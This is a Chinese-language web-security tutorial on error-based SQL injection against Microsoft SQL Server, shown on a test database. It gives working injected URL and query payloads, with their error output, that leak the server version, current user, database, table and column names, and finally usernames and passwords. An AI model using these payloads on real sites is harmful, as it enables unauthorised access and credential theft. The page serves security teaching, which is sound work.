0x00 测试数据

1> select * from article;
2> go
+----+-----------+-----------+
| id | title       | content    |
+----+-----------+-----------+
|  1 | 测试标题  | 测试内容  |
|  2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)

# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
|  1 | test-user-01 |  123456  | 
|  2 | test-user-02 |  234567  |
+----+--------------+----------+
2 rows in set (0.00 sec)

sql server> SELECT system_user;
+-----------------------+
| field1                |
+-----------------------+
| sa                    |
+-----------------------+
1 row in set (0.00 sec)

sql server> select db_name();
+-----------------------+
| field1                |
+-----------------------+
| test                  |
+-----------------------+
1 row in set (0.00 sec)

0x01 爆数据库版本

web语句: http://www.test.com/sql.php?id=1 and 1=@@version
数据库语句: select * from _users _where id =1 and 1=@@version

1> select * from users where id=-1 and 1=@@version;
2> go
22018 - [SQL Server]在将 nvarchar 值 'Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
    Sep 24 2019 13:48:23
    Copyright (C) 2019 Microsoft Corporation
    Developer Edition (64-bit) on Windows 10 Pro 10.0 <X64> (Build 17763: ) (Hypervisor)
' 转换成数据类型 int 时失败。

0x02 爆当前连接用户

web语句: http://www.test.com/sql.php?id=1 and 1=system_user

数据库语句: select * from users where id=1 and 1=system_user

1> select * from users where id=1 and 1=system_user;
2> go
22018 - [SQL Server]在将 nvarchar 值 'sa' 转换成数据类型 int 时失败。

0x03 爆当前连接的数据库

web语句: http://www.test.com/sql.php?id=1 and 1=db_name()

数据库语句: select * from _users _where id =1 and 1=db_name()

1> select * from users where id=1 and 1=db_name();
2> go
22018 - [SQL Server]在将 nvarchar 值 'test' 转换成数据类型 int 时失败。

0x04 爆库名

注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?id=1 and 1=db_name(1)

数据库语句: select * from _users _where id =1 and 1=db_name(1)

1> select *  from users where id =1 and 1=db_name(1);
2> go
22018 - [SQL Server]在将 nvarchar 值 'master' 转换成数据类型 int 时失败。

1> select *  from users where id =1 and 1=db_name(2);
2> go
22018 - [SQL Server]在将 nvarchar 值 'tempdb' 转换成数据类型 int 时失败。

0x05 爆表名

注意：
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段

查询不同的库可以这样
例如：
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1 and 1=(select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)

数据库语句: select * from users where id=1 and 1=(select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)

# 爆 1表
1> SELECT
    *
FROM
    users
WHERE
    id = 1
AND 1 = (
    SELECT
        table_name
    FROM
        (
            SELECT
                ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
                table_name
            FROM
                information_schema.tables
            WHERE
                table_catalog = db_name()
        ) AS a
    WHERE
        row_number = 1
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。

# 爆 2表
1> SELECT
    *
FROM
    users
WHERE
    id = 1
AND 1 = (
    SELECT
        table_name
    FROM
        (
            SELECT
                ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
                table_name
            FROM
                information_schema.tables
            WHERE
                table_catalog = db_name()
        ) AS a
    WHERE
        row_number = 2
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'users' 转换成数据类型 int 时失败。

0x06 暴字段

注意：
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段

查询不同的表可以这样
例如：
table_name=’要查询的表名’

查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1 and 1=(select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1)

数据库语句: select * from users where id=1 and 1=(select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1)

# 获取当前库 users表 第一个字段名称
1> SELECT
    *
FROM
    users
WHERE
    id = 1
AND 1 = (
    SELECT
        column_name
    FROM
        (
            SELECT
                ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
                column_name
            FROM
                information_schema.columns
            WHERE
                table_catalog = db_name()
            AND table_name = 'users'
        ) AS a
    WHERE
        row_number = 1
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'id' 转换成数据类型 int 时失败。

# 获取当前库 users表 第二个字段名称
1> SELECT
    *
FROM
    users
WHERE
    id = 1
AND 1 = (
    SELECT
        column_name
    FROM
        (
            SELECT
                ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
                column_name
            FROM
                information_schema.columns
            WHERE
                table_catalog = db_name()
            AND table_name = 'users'
        ) AS a
    WHERE
        row_number = 2
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'password' 转换成数据类型 int 时失败。

0x07 爆内容

注意：
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1 AND 1 = (select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)

数据库语句: SELECT FROM users WHERE id = 1 AND 1 = (select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1)

# 查询users表 第一条数据
1> SELECT
    *
FROM
    users
WHERE
    id = 1
AND 1 = (
    SELECT
        CAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)
    FROM
        (
            SELECT
                ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
            FROM
                users
        ) AS a
    WHERE
        row_number = 1
);
2> go
22018 - [SQL Server]在将 varchar 值 '1         |test-user-01|123456' 转换成数据类型 int 时失败。
1>

# 查询users表 第二条数据
1> SELECT
    *
FROM
    users
WHERE
    id = 1
AND 1 = (
    SELECT
        CAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)
    FROM
        (
            SELECT
                ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
            FROM
                users
        ) AS a
    WHERE
        row_number = 2
);
2> go
22018 - [SQL Server]在将 varchar 值 '2         |test-user-02|234567' 转换成数据类型 int 时失败。

关注作者和知识库后续更新
SQL Server 报错注入一 - 图1

web安全学习

SQL Server 报错注入一

0x00 测试数据

0x01 爆数据库版本

0x02 爆当前连接用户

0x03 爆当前连接的数据库

0x04 爆库名

0x05 爆表名

0x06 暴字段

0x07 爆内容

P喵呜-PHPoop

web安全-数据验证不当

新版74cms v4.2.1-v4.2.129-后台getshell漏洞

URL重定向-跳转漏洞介绍

浅谈PHP-反序列化漏洞